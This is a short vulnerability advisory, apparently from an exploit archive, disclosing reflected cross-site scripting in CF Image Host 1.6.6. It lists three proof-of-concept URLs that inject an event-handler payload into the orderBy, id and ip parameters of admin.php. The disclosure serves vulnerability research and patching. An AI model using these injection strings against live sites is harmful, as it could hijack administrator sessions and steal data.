CF Image Host 1.6.6 Cross Site Scripting Vulnerability

2015-11-16T00:00:00
ID 1337DAY-ID-24550
Type zdt
Reporter hyp3rlinx
Modified 2015-11-16T00:00:00

Description

CF Image Host version 1.6.6 suffers from multiple cross site scripting vulnerabilities.

                                        
                                            CF Image Host 1.6.6 Cross Site Scripting Vulnerability

Vendor:
====================================
codefuture.co.uk/projects/imagehost


Product:
===================================
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6


Vulnerability Details:
=====================

Multiple reflected XSS entry points exist allowing arbitrary client side
browser code execution on victims who click our infected linx. Undermining
the trust between the client and server, possibly leading to information
theft,
drop malware, steal session cookies etc...



XSS Exploit code(s):
===================

1)
http://localhost/imagehost1.6.6/admin.php?act=images&orderBy=%22%20onMouseMove=%22alert%280%29

2)
http://localhost/imagehost1.6.6/admin.php?act=edit&id=%22%20onMouseMove=%22alert%280%29


3)
http://localhost/imagehost1.6.6/admin.php?act=images&ip=%22%20onMouseMove=%22alert%280%29


Description:
=====================================================

Request Method(s):              [+] GET
Vulnerable Product:             [+] CF Image Host 1.65 - 1.6.6
Vulnerable Parameter(s):        [+] orderBy, id, ip

#  0day.today [2018-01-06]  #